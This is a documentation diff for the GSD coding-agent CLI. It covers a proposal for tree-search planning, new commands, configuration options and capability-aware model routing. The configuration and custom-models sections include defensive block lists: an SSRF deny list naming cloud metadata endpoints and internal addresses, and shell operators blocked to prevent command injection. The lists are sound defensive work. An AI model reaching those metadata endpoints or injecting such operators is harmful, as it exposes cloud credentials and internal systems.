Backtracks when a path fails, without wasting the user's context on dead ends + +### Current vs MCTS Approach + +**Current (linear):** +``` +User: "fix the auth bug" + │ + ▼ +Action 1: Read auth.ts ──▶ Action 2: Edit line 45 ──▶ Action 3: Run tests + │ + Tests fail ✗ + │ + ▼ + Action 4: Try different edit + │ + Tests fail ✗ + │ + ▼ + Action 5: Read error log... + (linear flailing) +``` + +**With MCTS (tree search):** +``` +User: "fix the auth bug" + │ + ▼ +Read auth.ts + │ + ├── Branch A: Edit line 45 (score: 0.6) + │ └── Run tests → FAIL → prune + │ + ├── Branch B: Check auth middleware (score: 0.7) ◀── highest score + │ └── Edit middleware.ts → Run tests → PASS ✓ + │ + └── Branch C: Check env config (score: 0.3) + └── (not explored — lower score) + +Result: Branch B succeeds after 2 actions, not 5+ +``` + +### Why It Fits GSD-2 + +GSD already has session branching primitives: +- `fork()` creates a branch from any message +- Branch summaries compress history at fork points +- Tree navigation (`/tree`) lets users explore branches +- Session tree is already a first-class concept + +The gap: these primitives are user-triggered. MCTS would make the agent trigger them automatically during problem-solving. 
+ +### Architecture + +``` +┌─────────────────────────────────────────────────────────┐ +│ MCTS Planning Layer │ +│ │ +│ ┌─────────────┐ ┌──────────────┐ ┌────────────┐ │ +│ │ Proposer │───▶│ Scorer │───▶│ Selector │ │ +│ │ Generate N │ │ Estimate P │ │ Pick best │ │ +│ │ candidates │ │ of success │ │ to explore │ │ +│ └─────────────┘ └──────────────┘ └─────┬──────┘ │ +│ │ │ +│ ┌─────────────┐ ┌──────────────┐ │ │ +│ │ Pruner │◀───│ Executor │◀─────────┘ │ +│ │ Kill dead │ │ Run action │ │ +│ │ branches │ │ in worktree │ │ +│ └─────────────┘ └──────────────┘ │ +└─────────────────────────────────────────────────────────┘ + │ + ▼ +┌─────────────────────┐ +│ Agent Session │ +│ (receives winning │ +│ branch as result) │ +└─────────────────────┘ +``` + +### Scoring Approaches + +| Approach | Speed | Quality | Cost | +|----------|-------|---------|------| +| **Heuristic** (file relevance, error proximity) | Fast | Low | Free | +| **Fast model** (haiku-class rates candidates) | Medium | Medium | Low | +| **Self-evaluation** (main model rates its own proposals) | Slow | High | High | +| **Learned scorer** (trained on past outcomes from learning graph) | Fast | High | Free at inference | + +### Integration Points + +| GSD Component | Role in Integration | +|---------------|-------------------| +| `agent-loop.ts` | New planning phase between user prompt and action execution | +| Session branching (`fork()`) | Used to create exploration branches | +| Git worktrees | Each branch explored in an isolated worktree | +| `agent-session.ts` | Receives the winning branch and presents it as the result | +| Skill Library Evolution (#1) | Provides learned patterns to improve the scorer over time | + +### Cost-Benefit Analysis + +| Factor | Value | +|--------|-------| +| **LLM calls per turn** | 2-5x more (proposal generation + scoring) | +| **Token usage** | 3-10x more per complex problem | +| **Success rate on hard problems** | Estimated 30-50% improvement | +| **Time to solution** | 
Fewer total turns despite more LLM calls per turn | +| **User experience** | Agent appears to "think harder" on hard problems | + +### Open Questions + +- **When to activate:** MCTS is expensive. Should it only activate when the agent detects a hard problem (repeated failures, high uncertainty)? +- **Branch isolation:** Git worktrees work for file changes, but how to isolate Bash side effects? +- **Budget control:** How many branches to explore before falling back to linear execution? +- **Transparency:** Should the user see the exploration tree or just the winning path? + +--- + +## Priority Matrix + +| # | Technique | Impact | Effort | Compounding | Dependencies | +|---|-----------|--------|--------|-------------|--------------| +| 1 | **Skill Library Evolution** | Massive | Medium | Yes — improves all other techniques | None | +| 2 | **DAG Tool Execution** | High | Medium | No — static speedup | None | +| 3 | **Speculative Tool Execution** | High | Low-Med | Yes — improves with learning | Benefits from #1 | +| 4 | **Semantic Context Compression** | High | High | No — static improvement | None | +| 5 | **Cross-Session Learning Graph** | Transformative | High | Yes — feeds #1, #3, #6 | Benefits from #1 | +| 6 | **MCTS Planning** | Transformative | Very High | Yes — improves with #1, #5 | Benefits from #1, #5 | + +### Recommended Implementation Order + +``` +Phase 1 (Foundation) Phase 2 (Performance) Phase 3 (Intelligence) +───────────────────── ───────────────────── ───────────────────── +┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ +│ Skill Library │ │ DAG Tool Exec │ │ Semantic Context│ +│ Evolution │──feeds──▶│ │ │ Compression │ +│ │ │ Speculative │ │ │ +│ │──feeds──▶│ Tool Exec │ │ MCTS Planning │ +└─────────────────┘ └─────────────────┘ └─────────────────┘ + │ ▲ +┌─────────────────┐ │ │ +│ Cross-Session │───────────────────┴──────────────────────────┘ +│ Learning Graph │ (feeds intelligence layer) +└─────────────────┘ +``` + +**Phase 1** 
creates the feedback loop that makes everything else better over time. +**Phase 2** delivers immediate, measurable performance wins. +**Phase 3** requires the most architectural change but delivers the deepest capability gains. + +--- + +## Sources & References + +### Papers + +- [SkillRL: Evolving Agents via Recursive Skill-Augmented RL](https://arxiv.org/abs/2602.08234) — ICLR 2026. Skill library evolution framework. +- [LLMCompiler: An LLM Compiler for Parallel Function Calling](https://arxiv.org/pdf/2312.04511) — ICML 2024. DAG-based tool execution. +- [Optimizing Agentic LLM Inference via Speculative Tool Calls](https://arxiv.org/pdf/2512.15834) — Speculative execution for agent tools. +- [RISE: Recursive Introspection for Self-Improvement](https://proceedings.neurips.cc/paper_files/paper/2024/file/639d992f819c2b40387d4d5170b8ffd7-Paper-Conference.pdf) — NeurIPS 2024. Self-improving LLM agents. +- [Don't Break the Cache: Prompt Caching for Agentic Tasks](https://arxiv.org/html/2601.06007v1) — Prompt caching evaluation. +- [Efficient LLM Serving for Agentic Workflows](https://arxiv.org/html/2603.16104v1) — Systems perspective on agent serving. + +### Industry & Analysis + +- [Context Engineering for Agents](https://rlancemartin.github.io/2025/06/23/context_engineering/) — Lance Martin's comprehensive guide. +- [AI Agent Context Compression Strategies](https://zylos.ai/research/2026-02-28-ai-agent-context-compression-strategies) — Zylos Research, Feb 2026. +- [Context Engineering for Coding Agents](https://martinfowler.com/articles/exploring-gen-ai/context-engineering-coding-agents.html) — Martin Fowler. +- [Memory for AI Agents: A New Paradigm](https://thenewstack.io/memory-for-ai-agents-a-new-paradigm-of-context-engineering/) — The New Stack. +- [LLM Compiler Agent Pattern](https://agent-patterns.readthedocs.io/en/stable/patterns/llm-compiler.html) — Agent Patterns documentation. 
+- [Skill Library Evolution Pattern](https://www.agentic-patterns.com/patterns/skill-library-evolution/) — Awesome Agentic Patterns. + +### Workshops & Events + +- [ICLR 2026 Workshop on AI with Recursive Self-Improvement](https://iclr.cc/virtual/2026/workshop/10000796) +- [Agent Memory Paper List](https://github.com/Shichun-Liu/Agent-Memory-Paper-List) — Comprehensive survey. +- [Awesome Context Engineering](https://github.com/Meirtz/Awesome-Context-Engineering) — Papers, frameworks, guides. diff --git a/docs/README.md b/docs/README.md index c37b303c0..f4b2d398b 100644 --- a/docs/README.md +++ b/docs/README.md @@ -11,7 +11,8 @@ Welcome to the GSD documentation. This covers everything from getting started to | [Commands Reference](./commands.md) | All commands, keyboard shortcuts, and CLI flags | | [Remote Questions](./remote-questions.md) | Discord and Slack integration for headless auto-mode | | [Configuration](./configuration.md) | Preferences, model selection, git settings, and token profiles | -| [Custom Models](./custom-models.md) | Add custom providers (Ollama, vLLM, LM Studio, proxies) via models.json | +| [Provider Setup](./providers.md) | Step-by-step setup for OpenRouter, Ollama, LM Studio, vLLM, and all supported providers | +| [Custom Models](./custom-models.md) | Advanced model configuration — models.json schema, compat flags, overrides | | [Token Optimization](./token-optimization.md) | Token profiles, context compression, complexity routing, and adaptive learning (v2.17) | | [Dynamic Model Routing](./dynamic-model-routing.md) | Complexity-based model selection, cost tables, escalation, and budget pressure (v2.19) | | [Captures & Triage](./captures-triage.md) | Fire-and-forget thought capture during auto-mode with automated triage (v2.19) | @@ -23,7 +24,7 @@ Welcome to the GSD documentation. 
This covers everything from getting started to | [Skills](./skills.md) | Bundled skills, skill discovery, and custom skill authoring | | [Migration from v1](./migration.md) | Migrating `.planning` directories from the original GSD | | [Troubleshooting](./troubleshooting.md) | Common issues, `/gsd doctor` (real-time visibility v2.40), `/gsd forensics` (full debugger v2.40), and recovery procedures | -| [Web Interface](./web-interface.md) | Browser-based project management with `pi --web` (v2.41) | +| [Web Interface](./web-interface.md) | Browser-based project management with `gsd --web` (v2.41) | | [VS Code Extension](../vscode-extension/README.md) | Chat participant, sidebar dashboard, and RPC integration for VS Code | ## Architecture & Internals @@ -34,6 +35,9 @@ Welcome to the GSD documentation. This covers everything from getting started to | [Native Engine](../native/README.md) | Rust N-API modules for performance-critical operations | | [ADR-001: Branchless Worktree Architecture](./ADR-001-branchless-worktree-architecture.md) | Decision record for the v2.14 git architecture | | [ADR-003: Pipeline Simplification](./ADR-003-pipeline-simplification.md) | Research merged into planning, mechanical completion (v2.30) | +| [ADR-004: Capability-Aware Model Routing](./ADR-004-capability-aware-model-routing.md) | Extend routing from tier/cost selection to task-capability matching | +| [ADR-007: Model Catalog Split](./ADR-007-model-catalog-split.md) | Separate model metadata from routing logic for extensibility | +| [Context Optimization Opportunities](./pi-context-optimization-opportunities.md) | Analysis of context window usage and optimization strategies | ## Pi SDK Documentation diff --git a/docs/architecture.md b/docs/architecture.md index a166c148b..381029731 100644 --- a/docs/architecture.md +++ b/docs/architecture.md @@ -14,7 +14,7 @@ gsd (CLI binary) ├─ resource-loader.ts Syncs bundled extensions + agents to ~/.gsd/agent/ └─ src/resources/ ├─ extensions/gsd/ 
Core GSD extension - ├─ extensions/... 12 supporting extensions + ├─ extensions/... 23 supporting extensions ├─ agents/ scout, researcher, worker ├─ AGENTS.md Agent routing instructions └─ GSD-WORKFLOW.md Manual bootstrap protocol @@ -73,6 +73,12 @@ Every dispatch creates a new agent session. The LLM starts with a clean context | **Remote Questions** | Discord, Slack, and Telegram integration for headless question routing | | **TTSR** | Tool-triggered system rules — conditional context injection based on tool usage | | **Universal Config** | Discovery of existing AI tool configurations (Claude Code, Cursor, Windsurf, etc.) | +| **AWS Auth** | AWS credential management and authentication | +| **Claude Code CLI** | Claude Code CLI integration | +| **cmux** | Context multiplexing for multi-session coordination | +| **GitHub Sync** | GitHub issue and PR synchronization | +| **Ollama** | Local Ollama model integration | +| **Shared** | Shared utilities across extensions | ## Bundled Agents @@ -122,7 +128,7 @@ The auto mode dispatch pipeline: Phase skipping (from token profile) gates steps 2-3: if a phase is skipped, the corresponding unit type is never dispatched. 
-## Key Modules (v2.33) +## Key Modules (v2.67) | Module | Purpose | |--------|---------| @@ -160,3 +166,11 @@ Phase skipping (from token profile) gates steps 2-3: if a phase is skipped, the | `memory-extractor.ts` | Extract reusable knowledge from session transcripts | | `memory-store.ts` | Persistent memory store for cross-session knowledge | | `queue-order.ts` | Milestone queue ordering | +| `context-masker.ts` | Context masking for model routing optimization | +| `phase-anchor.ts` | Phase anchoring for dispatch pipeline | +| `slice-parallel-orchestrator.ts` | Slice-level parallelism with dependency-aware dispatch | +| `slice-parallel-eligibility.ts` | Slice parallel eligibility checks | +| `slice-parallel-conflict.ts` | Slice parallel conflict detection | +| `preferences-models.ts` | Model preferences configuration | +| `preferences-validation.ts` | Preferences validation | +| `preferences-types.ts` | Preferences type definitions | diff --git a/docs/commands.md b/docs/commands.md index 5826978df..1ed935f8b 100644 --- a/docs/commands.md +++ b/docs/commands.md @@ -9,12 +9,16 @@ | `/gsd auto` | Autonomous mode — research, plan, execute, commit, repeat | | `/gsd quick` | Execute a quick task with GSD guarantees (atomic commits, state tracking) without full planning overhead | | `/gsd stop` | Stop auto mode gracefully | +| `/gsd pause` | Pause auto-mode (preserves state, `/gsd auto` to resume) | | `/gsd steer` | Hard-steer plan documents during execution | | `/gsd discuss` | Discuss architecture and decisions (works alongside auto mode) | | `/gsd status` | Progress dashboard | +| `/gsd widget` | Cycle dashboard widget: full / small / min / off | | `/gsd queue` | Queue and reorder future milestones (safe during auto mode) | | `/gsd capture` | Fire-and-forget thought capture (works during auto mode) | | `/gsd triage` | Manually trigger triage of pending captures | +| `/gsd dispatch` | Dispatch a specific phase directly (research, plan, execute, complete, reassess, 
uat, replan) |
+| `/gsd history` | View execution history (supports `--cost`, `--phase`, `--model` filters) |
 | `/gsd forensics` | Full-access GSD debugger — structured anomaly detection, unit traces, and LLM-guided root-cause analysis for auto-mode failures |
 | `/gsd cleanup` | Clean up GSD state files and stale worktrees |
 | `/gsd visualize` | Open workflow visualizer (progress, deps, metrics, timeline) |
@@ -22,6 +26,11 @@
 | `/gsd export --html --all` | Generate retrospective reports for all milestones at once |
 | `/gsd update` | Update GSD to the latest version in-session |
 | `/gsd knowledge` | Add persistent project knowledge (rule, pattern, or lesson) |
+| `/gsd fast` | Toggle service tier for supported models (prioritized API routing) |
+| `/gsd rate` | Rate last unit's model tier (over/ok/under) — improves adaptive routing |
+| `/gsd changelog` | Show categorized release notes |
+| `/gsd logs` | Browse activity logs, debug logs, and metrics |
+| `/gsd remote` | Control remote auto-mode |
 | `/gsd help` | Categorized command reference with descriptions for all GSD subcommands |

 ## Configuration & Diagnostics
@@ -33,6 +42,9 @@
 | `/gsd config` | Re-run the provider setup wizard (LLM provider + tool keys) |
 | `/gsd keys` | API key manager — list, add, remove, test, rotate, doctor |
 | `/gsd doctor` | Runtime health checks with auto-fix — issues surface in real time across widget, visualizer, and HTML reports (v2.40) |
+| `/gsd inspect` | Show SQLite DB diagnostics |
+| `/gsd init` | Project init wizard — detect, configure, bootstrap `.gsd/` |
+| `/gsd setup` | Global setup status and configuration |
 | `/gsd skill-health` | Skill lifecycle dashboard — usage stats, success rates, token trends, staleness warnings |
 | `/gsd skill-health <skill>` | Detailed view for a single skill |
 | `/gsd skill-health --declining` | Show only skills flagged for declining performance |
@@ -48,8 +60,10 @@
 | `/gsd new-milestone` | Create a new milestone |
 | `/gsd skip` | Prevent a unit from 
auto-mode dispatch |
 | `/gsd undo` | Revert last completed unit |
-| Park milestone | Available via `/gsd` wizard → "Milestone actions" → "Park" |
-| Unpark milestone | Available via `/gsd` wizard → "Milestone actions" → "Unpark" |
+| `/gsd undo-task` | Reset a specific task's completion state (DB + markdown) |
+| `/gsd reset-slice` | Reset a slice and all its tasks (DB + markdown) |
+| `/gsd park` | Park a milestone — skip without deleting |
+| `/gsd unpark` | Reactivate a parked milestone |
 | Discard milestone | Available via `/gsd` wizard → "Milestone actions" → "Discard" |

 ## Parallel Orchestration
@@ -65,6 +79,46 @@

 See [Parallel Orchestration](./parallel-orchestration.md) for full documentation.
+
+## Workflow Templates (v2.42)
+
+| Command | Description |
+|---------|-------------|
+| `/gsd start` | Start a workflow template (bugfix, spike, feature, hotfix, refactor, security-audit, dep-upgrade, full-project) |
+| `/gsd start resume` | Resume an in-progress workflow |
+| `/gsd templates` | List available workflow templates |
+| `/gsd templates info <template>` | Show detailed template info |
+
+## Custom Workflows (v2.42)
+
+| Command | Description |
+|---------|-------------|
+| `/gsd workflow new` | Create a new workflow definition (via skill) |
+| `/gsd workflow run <name>` | Create a run and start auto-mode |
+| `/gsd workflow list` | List workflow runs |
+| `/gsd workflow validate <file>` | Validate a workflow definition YAML |
+| `/gsd workflow pause` | Pause custom workflow auto-mode |
+| `/gsd workflow resume` | Resume paused custom workflow auto-mode |
+
+## Extensions
+
+| Command | Description |
+|---------|-------------|
+| `/gsd extensions list` | List all extensions and their status |
+| `/gsd extensions enable <name>` | Enable a disabled extension |
+| `/gsd extensions disable <name>` | Disable an extension |
+| `/gsd extensions info <name>` | Show extension details |
+
+## cmux Integration
+
+| Command | Description |
+|---------|-------------|
+| `/gsd cmux status` | Show cmux 
detection, prefs, and capabilities |
+| `/gsd cmux on` | Enable cmux integration |
+| `/gsd cmux off` | Disable cmux integration |
+| `/gsd cmux notifications on/off` | Toggle cmux desktop notifications |
+| `/gsd cmux sidebar on/off` | Toggle cmux sidebar metadata |
+| `/gsd cmux splits on/off` | Toggle cmux visual subagent splits |
+
 ## GitHub Sync (v2.39)

 | Command | Description |
@@ -116,6 +170,14 @@ Enable with `github.enabled: true` in preferences. Requires `gh` CLI installed a
 | `gsd --print "msg"` (`-p`) | Single-shot prompt mode (no TUI) |
 | `gsd --mode <mode>` | Output mode for non-interactive use |
 | `gsd --list-models [search]` | List available models and exit |
+| `gsd --web [path]` | Start browser-based web interface (optional project path) |
+| `gsd --worktree` (`-w`) [name] | Start session in a git worktree (auto-generates name if omitted) |
+| `gsd --no-session` | Disable session persistence |
+| `gsd --extension <path>` | Load an additional extension (can be repeated) |
+| `gsd --append-system-prompt <text>` | Append text to the system prompt |
+| `gsd --tools <list>` | Comma-separated list of tools to enable |
+| `gsd --version` (`-v`) | Print version and exit |
+| `gsd --help` (`-h`) | Print help and exit |
 | `gsd sessions` | Interactive session picker — list all saved sessions for the current directory and choose one to resume |
 | `gsd --debug` | Enable structured JSONL diagnostic logging for troubleshooting dispatch and state issues |
 | `gsd config` | Set up global API keys for search and docs tools (saved to `~/.gsd/agent/auth.json`, applies to all projects). See [Global API Keys](./configuration.md#global-api-keys-gsd-config). |
diff --git a/docs/configuration.md b/docs/configuration.md
index 4e99196d6..00512fa22 100644
--- a/docs/configuration.md
+++ b/docs/configuration.md
@@ -1,14 +1,14 @@
 # Configuration

-GSD preferences live in `~/.gsd/preferences.md` (global) or `.gsd/preferences.md` (project-local). Manage interactively with `/gsd prefs`. 
+GSD preferences live in `~/.gsd/PREFERENCES.md` (global) or `.gsd/PREFERENCES.md` (project-local). Manage interactively with `/gsd prefs`.

 ## `/gsd prefs` Commands

 | Command | Description |
 |---------|-------------|
 | `/gsd prefs` | Open the global preferences wizard (default) |
-| `/gsd prefs global` | Interactive wizard for global preferences (`~/.gsd/preferences.md`) |
-| `/gsd prefs project` | Interactive wizard for project preferences (`.gsd/preferences.md`) |
+| `/gsd prefs global` | Interactive wizard for global preferences (`~/.gsd/PREFERENCES.md`) |
+| `/gsd prefs project` | Interactive wizard for project preferences (`.gsd/PREFERENCES.md`) |
 | `/gsd prefs status` | Show current preference files, merged values, and skill resolution status |
 | `/gsd prefs wizard` | Alias for `/gsd prefs global` |
 | `/gsd prefs setup` | Alias for `/gsd prefs wizard` — creates preferences file if missing |
@@ -42,8 +42,8 @@ token_profile: balanced

 | Scope | Path | Applies to |
 |-------|------|-----------|
-| Global | `~/.gsd/preferences.md` | All projects |
-| Project | `.gsd/preferences.md` | Current project only |
+| Global | `~/.gsd/PREFERENCES.md` | All projects |
+| Project | `.gsd/PREFERENCES.md` | Current project only |

 **Merge behavior:**
 - **Scalar fields** (`skill_discovery`, `budget_ceiling`): project wins if defined
@@ -159,6 +159,8 @@
 | `GSD_PROJECT_ID` | (auto-hash) | Override the automatic project identity hash. Per-project state goes to `$GSD_HOME/projects/<id>/` instead of the computed hash. Useful for CI/CD or sharing state across clones of the same repo. (v2.39) |
 | `GSD_STATE_DIR` | `$GSD_HOME` | Per-project state root. Controls where `projects/<id>/` directories are created. Takes precedence over `GSD_HOME` for project state. |
 | `GSD_CODING_AGENT_DIR` | `$GSD_HOME/agent` | Agent directory containing managed resources, extensions, and auth. Takes precedence over `GSD_HOME` for agent paths. 
| +| `GSD_ALLOWED_COMMAND_PREFIXES` | (built-in list) | Comma-separated command prefixes allowed for `!command` value resolution. Overrides `allowedCommandPrefixes` in settings.json. See [Custom Models — Command Allowlist](custom-models.md#command-allowlist). | +| `GSD_FETCH_ALLOWED_URLS` | (none) | Comma-separated hostnames exempted from `fetch_page` URL blocking. Overrides `fetchAllowedUrls` in settings.json. See [URL Blocking](#url-blocking-fetch_page). | ## All Settings @@ -346,6 +348,43 @@ verification_max_retries: 2 # max retry attempts (default: 2) | `verification_auto_fix` | boolean | `true` | Auto-retry when verification fails | | `verification_max_retries` | number | `2` | Maximum auto-fix retry attempts | +### URL Blocking (`fetch_page`) + +The `fetch_page` tool blocks requests to private and internal network addresses to prevent server-side request forgery (SSRF). This protects against the agent being tricked into accessing internal services, cloud metadata endpoints, or local files. + +**Blocked by default:** + +| Category | Examples | +|----------|----------| +| Private IP ranges | `10.x.x.x`, `172.16-31.x.x`, `192.168.x.x`, `127.x.x.x` | +| Link-local / cloud metadata | `169.254.x.x` (AWS/GCP instance metadata) | +| Cloud metadata hostnames | `metadata.google.internal`, `instance-data` | +| Localhost | `localhost` (any port) | +| Non-HTTP protocols | `file://`, `ftp://` | +| IPv6 private ranges | `::1`, `fc00:`, `fd`, `fe80:` | + +Public URLs (`https://example.com`, `http://8.8.8.8`) are not affected. + +**Allowing specific internal hosts:** + +If you need the agent to fetch from internal URLs (self-hosted docs, internal APIs behind a VPN), add their hostnames to `fetchAllowedUrls` in global settings (`~/.gsd/agent/settings.json`): + +```json +{ + "fetchAllowedUrls": ["internal-docs.company.com", "192.168.1.50"] +} +``` + +Alternatively, set the `GSD_FETCH_ALLOWED_URLS` environment variable (comma-separated). 
The env var takes precedence over settings.json: + +```bash +export GSD_FETCH_ALLOWED_URLS="internal-docs.company.com,192.168.1.50" +``` + +Allowed hostnames bypass the blocklist checks. The protocol restriction (HTTP/HTTPS only) still applies — `file://` and `ftp://` cannot be allowlisted. + +> **Note:** This setting is global-only. Project-level settings.json cannot override the URL allowlist — this prevents a cloned repo from directing `fetch_page` at internal infrastructure. + ### `auto_report` (v2.26) Auto-generate HTML reports after milestone completion: @@ -374,8 +413,8 @@ git: auto_push: false # push commits to remote after committing push_branches: false # push milestone branch to remote remote: origin # git remote name - snapshots: false # WIP snapshot commits during long tasks - pre_merge_check: false # run checks before worktree merge (true/false/"auto") + snapshots: true # WIP snapshot commits during long tasks + pre_merge_check: auto # run checks before worktree merge (true/false/"auto") commit_type: feat # override conventional commit prefix main_branch: main # primary branch name merge_strategy: squash # how worktree branches merge: "squash" or "merge" @@ -392,8 +431,8 @@ git: | `auto_push` | boolean | `false` | Push commits to remote after committing | | `push_branches` | boolean | `false` | Push milestone branch to remote | | `remote` | string | `"origin"` | Git remote name | -| `snapshots` | boolean | `false` | WIP snapshot commits during long tasks | -| `pre_merge_check` | bool/string | `false` | Run checks before merge (`true`/`false`/`"auto"`) | +| `snapshots` | boolean | `true` | WIP snapshot commits during long tasks | +| `pre_merge_check` | bool/string | `"auto"` | Run checks before merge (`true`/`false`/`"auto"`) | | `commit_type` | string | (inferred) | Override conventional commit prefix (`feat`, `fix`, `refactor`, `docs`, `test`, `chore`, `perf`, `ci`, `build`, `style`) | | `main_branch` | string | `"main"` | Primary branch name | | 
`merge_strategy` | string | `"squash"` | How worktree branches merge: `"squash"` (combine all commits) or `"merge"` (preserve individual commits) | @@ -494,6 +533,14 @@ notifications: on_attention: true # notify when manual attention needed ``` +**macOS delivery:** GSD uses [`terminal-notifier`](https://github.com/julienXX/terminal-notifier) when available, falling back to `osascript`. We recommend installing `terminal-notifier` for reliable notification delivery: + +```bash +brew install terminal-notifier +``` + +Why: `osascript display notification` is attributed to your terminal app (Ghostty, iTerm2, etc.), which may not have notification permissions in System Settings → Notifications. `terminal-notifier` registers as its own app and prompts for permission on first use. See [Troubleshooting: Notifications not appearing on macOS](troubleshooting.md#notifications-not-appearing-on-macos) if notifications aren't working. + ### `remote_questions` Route interactive questions to Slack or Discord for headless auto mode: @@ -578,7 +625,7 @@ prefer_skills: avoid_skills: [] ``` -Skills can be bare names (looked up in `~/.gsd/agent/skills/`) or absolute paths. +Skills can be bare names (looked up in `~/.agents/skills/` and `.agents/skills/`) or absolute paths. ### `skill_rules` @@ -639,6 +686,7 @@ Complexity-based model routing. See [Dynamic Model Routing](./dynamic-model-rout ```yaml dynamic_routing: enabled: true + capability_routing: true # score models by task capability (v2.59) tier_models: light: claude-haiku-4-5 standard: claude-sonnet-4-6 @@ -648,6 +696,48 @@ dynamic_routing: cross_provider: true ``` +### `context_management` (v2.59) + +Controls observation masking and tool result truncation during auto-mode sessions. Reduces context bloat between compactions with zero LLM overhead. 
+ +```yaml +context_management: + observation_masking: true # replace old tool results with placeholders (default: true) + observation_mask_turns: 8 # keep results from last N user turns (1-50, default: 8) + compaction_threshold_percent: 0.70 # target compaction at 70% context usage (0.5-0.95, default: 0.70) + tool_result_max_chars: 800 # cap individual tool result content (200-10000, default: 800) +``` + +### `service_tier` (v2.42) + +OpenAI service tier preference for supported models. Toggle with `/gsd fast`. + +| Value | Behavior | +|-------|----------| +| `"priority"` | Priority tier — 2x cost, faster responses | +| `"flex"` | Flex tier — 0.5x cost, slower responses | +| (unset) | Default tier | + +```yaml +service_tier: priority +``` + +### `forensics_dedup` (v2.43) + +Opt-in: search existing issues and PRs before filing from `/gsd forensics`. Uses additional AI tokens. + +```yaml +forensics_dedup: true # default: false +``` + +### `show_token_cost` (v2.44) + +Opt-in: show per-prompt and cumulative session token cost in the footer. 
+ +```yaml +show_token_cost: true # default: false +``` + ### `auto_visualize` Show the workflow visualizer automatically after milestone completion: @@ -734,6 +824,13 @@ notifications: # Visualizer auto_visualize: true +# Service tier +service_tier: priority # "priority" or "flex" (for /gsd fast) + +# Diagnostics +forensics_dedup: true # deduplicate before filing forensics issues +show_token_cost: true # show per-prompt cost in footer + # Hooks post_unit_hooks: - name: code-review diff --git a/docs/context-and-hooks/07-the-system-prompt-anatomy.md b/docs/context-and-hooks/07-the-system-prompt-anatomy.md index aa0fc79ea..7bb2c57cc 100644 --- a/docs/context-and-hooks/07-the-system-prompt-anatomy.md +++ b/docs/context-and-hooks/07-the-system-prompt-anatomy.md @@ -174,7 +174,7 @@ When a skill file references a relative path, resolve it against the skill direc commit-outstanding Commit all uncommitted files in logical groups - /Users/you/.gsd/agent/skills/commit-outstanding/SKILL.md + /Users/you/.agents/skills/commit-outstanding/SKILL.md ``` diff --git a/docs/custom-models.md b/docs/custom-models.md index 943d213bf..76e949676 100644 --- a/docs/custom-models.md +++ b/docs/custom-models.md @@ -131,6 +131,36 @@ The `apiKey` and `headers` fields support three formats: "apiKey": "sk-..." ``` +#### Command Allowlist + +Shell commands (`!command`) are restricted to a set of known credential tools. Only commands starting with one of these are allowed to execute: + +`pass`, `op`, `aws`, `gcloud`, `vault`, `security`, `gpg`, `bw`, `gopass`, `lpass` + +Commands not on this list are blocked and the value resolves to `undefined`. A warning is written to stderr. + +Shell operators (`;`, `|`, `&`, `` ` ``, `$`, `>`, `<`) are also blocked in command arguments to prevent injection. 
+
+**Customizing the allowlist:**
+
+If you use a credential tool not on the default list, override it in global settings (`~/.gsd/agent/settings.json`):
+
+```json
+{
+  "allowedCommandPrefixes": ["pass", "op", "sops", "doppler", "mycli"]
+}
+```
+
+This replaces the default list entirely — include any defaults you still want.
+
+Alternatively, set the `GSD_ALLOWED_COMMAND_PREFIXES` environment variable (comma-separated). The env var takes precedence over settings.json:
+
+```bash
+export GSD_ALLOWED_COMMAND_PREFIXES="pass,op,sops,doppler"
+```
+
+> **Note:** This setting is global-only. Project-level settings.json (`<project>/.gsd/settings.json`) cannot override the command allowlist — this prevents a cloned repo from escalating command execution privileges.
+
 ### Custom Headers

 ```json
diff --git a/docs/dynamic-model-routing.md b/docs/dynamic-model-routing.md
index 9d0d5525e..bc88df2bd 100644
--- a/docs/dynamic-model-routing.md
+++ b/docs/dynamic-model-routing.md
@@ -1,12 +1,20 @@
 # Dynamic Model Routing

-*Introduced in v2.19.0*
+*Introduced in v2.19.0. Capability scoring introduced in v2.52.0.*

 Dynamic model routing automatically selects cheaper models for simple work and reserves expensive models for complex tasks. This reduces token consumption by 20-50% on capped plans without sacrificing quality where it matters.

+Starting in v2.52.0, the router uses **capability-aware scoring** to select the *best fit* model for each task, not just the cheapest one in the tier.
+
 ## How It Works

-Each unit dispatched by auto-mode is classified into a complexity tier:
+Each unit dispatched by auto-mode passes through a two-stage pipeline:
+
+**Stage 1: Complexity classification** — classifies the work into a tier (light/standard/heavy).
+
+**Stage 2: Capability scoring** — within the eligible tier, ranks available models by how well their capabilities match the task's requirements.
+
+The key rule: **downgrade-only semantics**. 
The user's configured model is always the ceiling — routing never upgrades beyond what you've configured. | Tier | Typical Work | Default Model Level | |------|-------------|-------------------| @@ -14,8 +22,6 @@ Each unit dispatched by auto-mode is classified into a complexity tier: | **Standard** | Research, planning, execution, milestone completion | Sonnet-class | | **Heavy** | Replanning, roadmap reassessment, complex execution | Opus-class | -The router then selects a model for that tier. The key rule: **downgrade-only semantics**. The user's configured model is always the ceiling — routing never upgrades beyond what you've configured. - ## Enabling Dynamic routing is off by default. Enable it in preferences: @@ -41,6 +47,7 @@ dynamic_routing: budget_pressure: true # auto-downgrade when approaching budget ceiling (default: true) cross_provider: true # consider models from other providers (default: true) hooks: true # apply routing to post-unit hooks (default: true) + capability_routing: true # enable capability scoring within tier (default: true) ``` ### `tier_models` @@ -70,6 +77,157 @@ When approaching the budget ceiling, the router progressively downgrades: When enabled, the router may select models from providers other than your primary. This uses the built-in cost table to find the cheapest model at each tier. Requires the target provider to be configured. +### `capability_routing` + +When enabled (default: true), the router uses capability scoring to pick the best model in a tier rather than always defaulting to the cheapest. 
Set to `false` to revert to cheapest-in-tier behavior: + +```yaml +dynamic_routing: + enabled: true + capability_routing: false # disable scoring, use cheapest-in-tier +``` + +## Capability Profiles + +Each model has a built-in **capability profile** — a 7-dimension score (0–100) representing how well it handles different task types: + +| Dimension | What It Represents | +|-----------|-------------------| +| `coding` | Code generation and implementation accuracy | +| `debugging` | Diagnosing and fixing errors | +| `research` | Synthesizing information and exploring topics | +| `reasoning` | Multi-step logical reasoning | +| `speed` | Latency and throughput (inverse of capability depth) | +| `longContext` | Handling large codebases and long documents | +| `instruction` | Following structured instructions precisely | + +**Built-in profiles** exist for 9 models: `claude-opus-4-6`, `claude-sonnet-4-6`, `claude-haiku-4-5`, `gpt-4o`, `gpt-4o-mini`, `gemini-2.5-pro`, `gemini-2.0-flash`, `deepseek-chat`, `o3`. + +Models without a built-in profile receive **uniform scores of 50** across all dimensions. This is a cold-start policy — unknown models compete but don't have an advantage. From the user's perspective, routing behaves the same as before capability scoring was introduced for those models. + 